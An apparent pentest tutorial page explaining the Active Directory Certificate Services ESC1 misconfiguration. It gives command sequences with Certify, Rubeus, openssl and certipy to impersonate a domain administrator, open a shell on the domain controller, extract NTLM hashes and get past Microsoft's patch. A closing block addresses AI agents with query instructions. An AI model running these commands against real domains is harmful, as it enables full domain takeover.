# ESC1

### What is AD-CS?

**AD-CS** (Active Directory Certificate Services) is Microsoft's internal PKI (Public Key Infrastructure) the certificate authority built into every Windows enterprise domain.

AD-CS issues digital certificates to:

| Issued To   | Used For                             |
| ----------- | ------------------------------------ |
| Users       | Authentication                       |
| Computers   | Encryption                           |
| Smart Cards | Signing                              |
| Services    | VPN & Wi-Fi Access, Smart Card Logon |

{% hint style="info" icon="file-certificate" %}
Think of AD-CS as the **"internal certificate authority for a Windows enterprise."** It's the system that decides who gets to prove their identity using a certificate instead of a password.
{% endhint %}

## What is ESC1?

ESC1 is a **misconfigured certificate template** vulnerability that allows a low-privileged domain user to **request a certificate on behalf of any user** including Domain Admins.

#### Conditions Required for ESC1 Abuse

All of the following must be true on the vulnerable template:

**ESC1 is exploitable when:**

1. The template has an **AD Authentication EKU** enabled (any of the three below)
2. **`ENROLLEE_SUPPLIES_SUBJECT`** is enabled
3. **Low-privileged users** have **Enroll** rights on the template 

## Key Concepts

### Extended Key Usages (EKUs)

EKUs define what a certificate is *allowed to do*. For ESC1, one of these must be present:

#### Smart Card Logon — `1.3.6.1.4.1.311.20.2.2`

> "This certificate is allowed to be used for logging into a domain account."

* Allows a user to authenticate to AD using a **certificate instead of a password**
* Typically stored on a smart card or USB security key
* Requires a PIN to unlock the private key

#### Client Authentication — `1.3.6.1.5.5.7.3.2`

> "This certificate can be used to authenticate a client to a server."

* General-purpose certificate-based login
* **Not** limited to smart cards
* Required for Kerberos certificate authentication (PKINIT)

#### PKINIT Client Authentication — `1.3.6.1.5.2.3.4`

> "This certificate can be used to authenticate to Kerberos using public key cryptography."

* **PKINIT** = Public Key Cryptography for Initial Authentication in Kerberos
* Directly enables: **Certificate → Kerberos TGT** authentication

### ENROLLEE\_SUPPLIES\_SUBJECT

*`This is the`` `**`root cause`**` ``of ESC1.`*

**Normal behaviour:** The CA defines who the certificate is issued to.

**With this flag enabled:** The *requester* gets to define the Subject and SAN — meaning a low-privileged user can claim: I am `administrator@l1nuxkid.dev"` 

When combined with the right EKU and enroll permissions, this allows impersonation of **any domain account**.

### SAN (Subject Alternative Name)

The SAN field inside a certificate can store:

* **UPN** (= `administrator@l1nuxkid.dev`
* DNS name
* Email address

If the SAN contains `administrator@l1nuxkid.dev`, Active Directory will **map the certificate to that account** during authentication, regardless of who actually requested it.

## Exploitation ESC1 Using Windows

#### Step 1  Enumerate Certificate Authorities (CA)

```
certify.exe cas
```

#### Step 2  Find Vulnerable Templates

```
certify.exe find /vulnerable
certify.exe find
```

Look for templates where:

* `msPKI-Certificate-Name-Flag` includes `ENROLLEE_SUPPLIES_SUBJECT`
* EKU includes Client Authentication / Smart Card Logon / PKINIT
* Low-privileged users (Domain Users) have **Enroll** rights

<figure><img src="/files/RDbhlYpFUus9AazhZzxn" alt=""><figcaption></figcaption></figure>

#### Step 3  Request a Certificate as Administrator

Our current user has **Enroll** rights + `ENROLLEE_SUPPLIES_SUBJECT` is set → we can request a cert for **any user**.&#x20;

```
certify.exe /ca:CA-NAME /template:TEMP_NAME_HERE /altname:administrator /sidextension:S-1-5-SNIP- /domain:l1nuxkid.dev
```

* Save the output certificate as `esc1.pem`.

#### Step 4  Convert Certificate to PFX

```
openssl pkcs12 -in esc1.pem -inkey esc1.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx
```

* Enter a password when prompted (e.g. `l1nuxkid`)

#### Step 5  Request a TGT with Rubeus

```
Rubeus.exe asktgt /user:administrator /domain:l1nuxkid.dev /certificate:esc1.pfx /password:l1nuxkid /dc:dc01.l1nuxkid.dev /nowrap /ptt
```

#### Step 6 Verify & Use

```
# Verify the ticket was injected
klist

# Spawn a remote shell on the DC
winrs -r:dc01.l1nuxkid.dev cmd.exe
```

## Exploiting ESC1 Using Linux&#x20;

#### Step 1  Find Vulnerable Templates

```
certipy find -vulnnerable -u username@domain.com -hashes "NT:LM" --dc-ip <> -stdout
```

<figure><img src="/files/hghMeiAIEhYRVzdJQXcN" alt=""><figcaption></figcaption></figure>

#### Step 2  Request Certificate as Administrator

```
certipy req -u username@l1nuxkid.dev -hashes "NT:LM" -dc-ip dc01.l1nuxkid.dev -target dc01.l1nuxkid.dev -ca 'CA_NAME' -template 'TEMPLATE_NAME' -upn administrator@l1nuxkid.dev -extension-sid <SNIP> -out esc1-certipy_cert -debug
```

The `-extension-sid` flag is used to **bypass the CBA (Certificate-Based Authentication) patch** introduced by Microsoft to mitigate ESC1. Always include the SID extension when targeting patched environments.&#x20;

#### Step 3  Authenticate & Retrieve NTLM Hash

```
certipy auth -pfx esc1-certipy_cert.pfx
```

This performs **UnPAC-the-Hash**  extracting the NTLM hash of the impersonated account from the Kerberos PAC, which can then be used for Pass-the-Hash.

### Tools Reference

| Tool                                                  | Platform      | Purpose                          |
| ----------------------------------------------------- | ------------- | -------------------------------- |
| [`Certify.exe`](https://github.com/GhostPack/Certify) | Windows       | Enumerate & request certificates |
| [`Rubeus.exe`](https://github.com/ghostpack/rubeus)   | Windows       | Request TGT from certificate     |
| [`Certipy`](https://github.com/ly4k/Certipy)          | Linux         | All-in-one AD-CS attack tool     |
| [`openssl`](https://github.com/openssl/openssl)       | Linux/Windows | Convert PEM → PFX                |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.